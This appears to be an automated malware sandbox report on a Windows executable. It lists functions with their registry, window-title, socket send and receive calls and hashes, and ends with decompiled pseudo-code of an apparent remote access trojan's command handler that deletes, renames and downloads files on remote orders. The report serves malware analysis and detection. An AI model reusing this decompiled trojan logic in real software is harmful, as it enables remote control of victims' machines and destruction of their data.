Instruction ID: 4b3672921d85d94027c856c8d4557e31c130c3ea1869d6c91df0e3c849bae827
Opcode Fuzzy Hash: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
Instruction Fuzzy Hash: 8AE0E537149A112AE222223A6C49E7B3619CFC67BA716002BF10886142DF288D0305AD

Uniqueness

Uniqueness Score: -1.00%

Function 004108E2, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
RegCloseKey.ADVAPI32(00000000), ref: 0041092C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00410885, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
RegCloseKey.KERNELBASE(?), ref: 004108CE

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94

Uniqueness

Uniqueness Score: -1.00%

Function 00416ED0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,00000001), ref: 00416EE4

Strings

@, xrefs: 00416EDA

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: ce4d863d7768f255fddeabf47dc1dbfb58c639174398680716ba09d3759aad2e
Instruction ID: 6e419d6119f7d5a92ba7ea5aa2db3d9dcc0ca085608ff36f3d6b7b397ab9513c
Opcode Fuzzy Hash: ce4d863d7768f255fddeabf47dc1dbfb58c639174398680716ba09d3759aad2e
Instruction Fuzzy Hash: 3ED017B580231C9FC720EFA8E804A8DBBFCFB08210F00056AEC49E3300E770A8108B95

Uniqueness

Uniqueness Score: -1.00%

Function 00401646, Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
Instruction ID: 14bc11751579f6a418080d33961eb9a75802e287542bdf943e450bbe308a60cc
Opcode Fuzzy Hash: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
Instruction Fuzzy Hash: BCF0B4712142085BCB0C9E34AC91BBA375D5B11368BA44B7FF02EDA1E1D73BD984824C

Uniqueness

Uniqueness Score: -1.00%

Function 0043CFE1, Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D02F

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
Instruction ID: fba902ad4ccf31a8b90f9fdf44a17567959da2f799f45fbd848029ef9f978f3d
Opcode Fuzzy Hash: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
Instruction Fuzzy Hash: 56E0A02290541160E239363B7C0565B0265CBC973DF10432BF624C62C2EFAC884341AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043D03A, Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D083

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0ed99ebbe2187b1f32701bb3281fabb5ff88b2b1b91a9808e210955f1cab387e
Instruction ID: 74d36269402cbfa58112ba2610b1878482336c4429228e10655473553982713d
Opcode Fuzzy Hash: 0ed99ebbe2187b1f32701bb3281fabb5ff88b2b1b91a9808e210955f1cab387e
Instruction Fuzzy Hash: 89E0ED22A0941061E629323E7C4176B02668BC677DF21132BF528C62C2EFBC488381AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041719C, Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004171A8
GetWindowTextW.USER32 ref: 004171BB

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: de6f372f724c64eaa2c7ed6c2aac536a81d6c43785f51a9ef177bda7df55ad17
Instruction ID: aaff8fddf6ef76f16923c3f9de4e1078fffc563957b707b355cfa3dba45694d1
Opcode Fuzzy Hash: de6f372f724c64eaa2c7ed6c2aac536a81d6c43785f51a9ef177bda7df55ad17
Instruction Fuzzy Hash: 2ED0C231A0032867EA206BE49C4DFA5772C9704B42F0001AABD14D3182DD74990487D4

Uniqueness

Uniqueness Score: -1.00%

Function 00402D0D, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402D12

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
Instruction ID: e6e99268b29485b263ac33084d07fd67f49e3475c5b5c63b65d8ccfcab0936ee
Opcode Fuzzy Hash: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
Instruction Fuzzy Hash: 1B218571B001055BCB14EFB6858A6BE77AAAF84314F10403FE415BB2C2DBBC5E019799

Uniqueness

Uniqueness Score: -1.00%

Function 00404AA4, Relevance: 1.6, APIs: 1, Instructions: 65networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 25d7fed7c81a192a25496bf869757bfb83f96b60a3083e9c2314e92a879b28c7
Instruction ID: b7cc105376a0c6c17fc0074abac2d673c8eb48d7e6be34cea40eb70dca5961eb
Opcode Fuzzy Hash: 25d7fed7c81a192a25496bf869757bfb83f96b60a3083e9c2314e92a879b28c7
Instruction Fuzzy Hash: 7E214F7190020AABC705FB51E856FEEB778AF10304F10817FA5127B1E1DF78A905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00448354, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0043F348: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389

_free.LIBCMT ref: 004483C0

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 1c4e2f15c0be4fd7432d5764b9d18203d050bdf7f8d2042484f8342e9df57e93
Instruction ID: 60c65a57f4404dc7eec93e126a54dda1ba11399514c1d014c30e87a140478a45
Opcode Fuzzy Hash: 1c4e2f15c0be4fd7432d5764b9d18203d050bdf7f8d2042484f8342e9df57e93
Instruction Fuzzy Hash: 8C01D6722003456BF3218E6A984195EFBE9EB85374F25052EE98493280EB35A905C768

Uniqueness

Uniqueness Score: -1.00%

Function 00422179, Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C

WSAGetLastError.WS2_32 ref: 0042219B

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
Instruction ID: 5fd3ebf0e0d9901e6086a92a38d31c1d4f4930f82062b2ddb0320275891adbe9
Opcode Fuzzy Hash: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
Instruction Fuzzy Hash: B7F0A43230C1297A9F189959FE94C7933459F85374BB0436BFE3AC65F0EA6998602149

Uniqueness

Uniqueness Score: -1.00%

Function 0043F348, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
Instruction ID: 680b6e8bc4c2fa124abf68bcdd5a812fa191381f72dfdd1accecd8568f1e318d
Opcode Fuzzy Hash: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
Instruction Fuzzy Hash: 8AF0E931A00321AADF216A639C45B5B3788AF4D7B1F15A037FC04DB690DA3CDC5986ED

Uniqueness

Uniqueness Score: -1.00%

Function 004221EA, Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275

WSAGetLastError.WS2_32 ref: 0042220C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
Instruction ID: 207b8048d6da47c8d3e1bf0cf2b23625c58979fe3f9e08f58dd8cb8bfe01de6d
Opcode Fuzzy Hash: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
Instruction Fuzzy Hash: 19F0BB3530C534FADF18995CFE548393341AF45330B70439BF939866F0DA6E5850917A

Uniqueness

Uniqueness Score: -1.00%

Function 00424E2B, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00424E4E

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 213c8ad60bcf00827f18147b081050361add05c8605f2d1588902cc22186a757
Instruction ID: 91fcd9f2d65c70f63789f855a9a09aa89de8be21b0d3159f81b9c9a6f631e38b
Opcode Fuzzy Hash: 213c8ad60bcf00827f18147b081050361add05c8605f2d1588902cc22186a757
Instruction Fuzzy Hash: 0BF05922B00324ABDB10D6B5D9027CBB7ECEF44318F40046ED904C3041E729E704C765

Uniqueness

Uniqueness Score: -1.00%

Function 0043F98C, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
Instruction ID: 400f104e77b540acbfcd3781324d28ce3e91d9a3d9d75f8370708e8767061156
Opcode Fuzzy Hash: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
Instruction Fuzzy Hash: 01E02BB290022177DB2126625C0075B36489F5D7B1F103037FD05922C0DB6CCC0582EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040498B, Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 004049AC

Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Startupsocket
String ID:
API String ID: 3996037109-0
Opcode ID: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
Instruction ID: 643c1d6dd67993fbe743bd4810411797e70fdf622d87f5941d6678f6439cf7cf
Opcode Fuzzy Hash: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
Instruction Fuzzy Hash: 68F0BEF10057905AE7314F344880393BFD45B52318F14897FE6D2A3BC2C2B9A819C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00910000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL(00000000), ref: 00910023

Memory Dump Source

Source File: 00000007.00000002.923900889.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00990000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL(00000000), ref: 00990023

Memory Dump Source

Source File: 00000007.00000002.924014470.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: false

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00404B5A, Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(FFFFFFFF,0046BACC,?,00000000), ref: 00404B82

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: f51da9c7f7a354ed60f7591d544108ff1c1d334abc874874dee1a6f4a1b8aa5d
Instruction ID: f3ec6d8f34401422f244b447c80db10cf3c514e603278a65c5bd388ab48e0435
Opcode Fuzzy Hash: f51da9c7f7a354ed60f7591d544108ff1c1d334abc874874dee1a6f4a1b8aa5d
Instruction Fuzzy Hash: 2DE08672048204BFDB056F40DC46FA97F29DB54765F24C11EFA08191A2DB33F552D748

Uniqueness

Uniqueness Score: -1.00%

Function 004049DE, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004049F3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
Instruction ID: 820ae791bcbb1d2b57b63688d1298c64991293a60e6d01c8c57279511ad2648c
Opcode Fuzzy Hash: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
Instruction Fuzzy Hash: 59D0123255861C4ED611AAB4AD0F8A5B76CC313A12F4003BAACB5C25D3F650572CC2FB

Uniqueness

Uniqueness Score: -1.00%

Function 0042226A, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00422275

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
Instruction ID: fff77dfbf1f0459fa3aaeb9656e953647c3761fb795b74ea4a0806b79efbc88b
Opcode Fuzzy Hash: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
Instruction Fuzzy Hash: 70C04C79104608BB9B061FA19D08C793B69D7456617008025B90556151D576DA5096B5

Uniqueness

Uniqueness Score: -1.00%

Function 00930000, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923924867.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040697D, Relevance: 35.7, APIs: 7, Strings: 13, Instructions: 697
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040697D(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v180;
				char _v192;
				void* _v204;
				char _v208;
				char _v212;
				char _v216;
				void* _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				void* _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				void* _v300;
				void* _v308;
				void* _v312;
				char _v324;
				char _v336;
				char _v344;
				char _v348;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t160;
				signed int _t162;
				void* _t166;
				void* _t171;
				signed int _t172;
				void* _t187;
				void* _t202;
				signed int _t204;
				void* _t218;
				int _t228;
				void* _t235;
				void* _t236;
				void* _t249;
				void* _t256;
				signed int _t261;
				void* _t265;
				void* _t277;
				short* _t288;
				void* _t289;
				void* _t300;
				void* _t316;
				void* _t326;
				void* _t332;
				void* _t334;
				void* _t336;
				void* _t340;
				void* _t344;
				void* _t354;
				void* _t356;
				void* _t377;
				void* _t380;
				void* _t542;
				void* _t569;
				intOrPtr _t574;
				intOrPtr _t575;
				signed int _t576;
				signed int _t578;
				signed int _t581;
				void* _t588;
				void* _t590;
				void* _t592;
				void* _t594;
				void* _t596;
				signed int _t597;
				void* _t600;
				void* _t601;
				void* _t602;
				void* _t603;
				void* _t604;
				void* _t605;
				void* _t606;
				void* _t609;
				void* _t614;
				void* _t615;
				void* _t616;
				void* _t618;
				void* _t620;
				void* _t639;
				void* _t640;
				void* _t641;
				void* _t642;
				void* _t645;
				void* _t647;

				_t646 = __eflags;
				_t550 = __edx;
				_push(_t356);
				_t574 = _a4;
				_push(_t569);
				E004020EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
				SetEvent( *(_t574 + 0x34));
				_t575 =  *((intOrPtr*)(E00401F95( &_v160)));
				E004042A6( &_v160,  &_v136, 4, 0xffffffff);
				_t600 = (_t597 & 0xfffffff8) - 0xec;
				E004020EC(0x46c238, _t600, _t550, _t646, 0x46c238);
				_t601 = _t600 - 0x18;
				E004020EC(0x46c238, _t601, _t550, _t646,  &_v152);
				E00417478( &_v288, _t550);
				_t602 = _t601 + 0x30;
				_t647 = _t575 - 0x8b;
				if(_t647 > 0) {
					_t576 = _t575 - 0x8c;
					__eflags = _t576;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
						_t160 = GetFileAttributesW(E00401EEB( &_v260));
						__eflags = _t160 & 0x00000010;
						if((_t160 & 0x00000010) == 0) {
							_t162 = DeleteFileW(E00401EEB( &_v260));
						} else {
							_t162 = E00417754(E00401EEB( &_v260));
						}
						__eflags = _t162;
						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
						if(__eflags == 0) {
							_t603 = _t602 - 0x18;
							E0041739C(0x46c238, _t603,  &_v252);
							_push(0x55);
							E00404AA4(0x46c238, 0x46c2e8,  &_v252, __eflags);
							_t166 = E0041733B( &_v208,  &_v280);
							_t604 = _t603 - 0x18;
							_t553 = "Unable to delete: ";
							E004075C2(0x46c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
							_t605 = _t604 - 0x14;
							_t377 = _t605;
							_push("[ERROR]");
						} else {
							_t187 = E0041733B( &_v180,  &_v252);
							_t609 = _t602 - 0x18;
							_t553 = "Deleted file: ";
							E004075C2(0x46c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
							_t605 = _t609 - 0x14;
							_t377 = _t605;
							_push("[Info]");
						}
						E00402084(0x46c238, _t377);
						E00416C80(0x46c238, _t569);
						_t606 = _t605 + 0x30;
						E00401FC7();
						_t171 = E00401E49( &_v288, _t553, __eflags, 1);
						_t550 = "1";
						_t380 = _t171;
						_t172 = E00405A6F("1");
						__eflags = _t172;
						if(_t172 == 0) {
							L40:
							E00401EF0();
							L41:
							E00401E74( &_v284, _t550);
							E00401FC7();
							E00401FC7();
							return 0;
						} else {
							__eflags = E00407323( &_v272, _t380, _t380) + 1;
							E0040733F(E00407323( &_v272, _t380, _t380) + 1);
							_t550 =  &_v284;
							E00401EFA( &_v284,  &_v284, _t576, E00402FFA(0x46c238,  &_v212,  &_v284, 0x2a));
							E00401EF0();
							E0040427F(0x46c238, _t606 - 0x18, E00401EEB( &_v288));
							L39:
							E004061C3();
							goto L40;
						}
					}
					_t578 = _t576 - 1;
					__eflags = _t578;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
						E0040427F(0x46c238,  &_v216, E00401F95(E00401E49( &_v272, _t550, __eflags, 1)));
						E00407309( &_v276,  &_v252, 0, E00407323( &_v268,  &_v216,  &_v216) + 1);
						_t202 = E00401EEB(E00407629( &_v216,  &_v264,  &_v240));
						_t204 = E00439924(E00401EEB( &_v288), _t202);
						asm("sbb bl, bl");
						E00401EF0();
						_t361 =  ~_t204 + 1;
						__eflags =  ~_t204 + 1;
						if(__eflags == 0) {
							_t550 = E004075E6( &_v180, "Unable to rename file!", __eflags, 0x46c238);
							E00405343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
							_push(0x59);
							E00404AA4(_t361, 0x46c2e8, _t206, __eflags);
							E00401FC7();
						} else {
							_t550 =  &_v228;
							E00407514(_t602 - 0x18,  &_v228, __eflags, "*");
							E004061C3();
						}
						E00401EF0();
						L13:
						E00401EF0();
						goto L40;
					}
					_t581 = _t578 - 1;
					__eflags = _t581;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, E00401F95(E00401E49( &_v264, _t550, __eflags, 0)));
						_t218 = E00401F95(E00401E49( &_v272, _t550, __eflags, 1));
						_t550 =  &_v264;
						CreateDirectoryW(E00401EEB(E00407514( &_v192,  &_v264, __eflags, _t218)), 0);
						E00401EF0();
						E00403300(0x2a);
						E00407350(0x46c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
						goto L39;
					}
					_t583 = _t581 - 3;
					__eflags = _t581 - 3;
					if(__eflags == 0) {
						_t228 = StrToIntA(E00401F95(E00401E49( &_v264, _t550, __eflags, _t583)));
						_t550 = E00401F95(E00401E49( &_v268, _t550, __eflags, 1));
						E00417F10(_t228, _t230);
					}
					goto L41;
				}
				if(_t647 == 0) {
					E004020D5(0x46c238,  &_v180);
					E0040484E(0x46c238,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E00404A08(_t550);
					_t235 = E00401E49( &_v284, _t550, __eflags, 3);
					_t614 = _t602 - 0xfffffffffffffff8;
					_t236 = E00401E49( &_v288, _t550, __eflags, 2);
					E00402F93(0x46c238, _t614, E00402F93(0x46c238,  &_v236, E00402F93(0x46c238,  &_v260, E00402FB7( &_v284, E00401E49( &_v292, _t550, __eflags, 1), 0x46c238), __eflags, _t236), __eflags, 0x46c238), __eflags, _t235);
					E00404AA4(0x46c238,  &_v140, _t240, __eflags);
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E0040427F(0x46c238,  &_v292, E00401F95(E00401E49( &_v324, _t240, __eflags, 0)));
					_t249 = E0041733B( &_v272,  &_v296);
					_t615 = _t614 - 0x18;
					E004075C2(0x46c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
					_t616 = _t615 - 0x14;
					E00402084(0x46c238, _t616, "[Info]");
					E00416C80(0x46c238, "[Info]");
					E00401FC7();
					E00401EF0();
					_t256 = E00401F95(E00401E49( &_v336, "Downloading file: ", __eflags, 0));
					_t618 = _t616 + 0x30 - 0x18;
					E0040427F(0x46c238, _t618, _t256);
					_t261 = E004062D8( &_v192, __eflags, E004398A0(_t258, E00401F95(E00401E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t620 = _t618 + 0x2c;
					_push(0);
					__eflags = _t261;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v264, E00401F95(E00401E49( &_v348, "Downloading file: ", __eflags)));
						_t265 = E0041733B( &_v244,  &_v268);
						_t550 = "Failed to download file: ";
